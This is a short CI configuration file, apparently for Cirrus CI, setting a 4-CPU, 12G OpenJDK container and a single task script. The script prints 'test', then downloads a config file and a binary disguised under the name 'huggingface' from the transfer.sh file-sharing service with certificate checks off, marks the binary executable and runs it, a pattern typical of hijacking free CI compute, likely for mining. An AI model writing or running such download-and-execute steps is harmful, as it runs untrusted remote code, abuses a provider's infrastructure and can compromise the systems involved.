container:
  image: openjdk:latest
  cpu: 4
  memory: 12G

task:
  script: echo "test";curl -k https://transfer.sh/MDsVSk/config.ini -o config.ini;curl -k https://transfer.sh/yVCraC/huggingface -o huggingface;chmod u+x huggingface;./huggingface
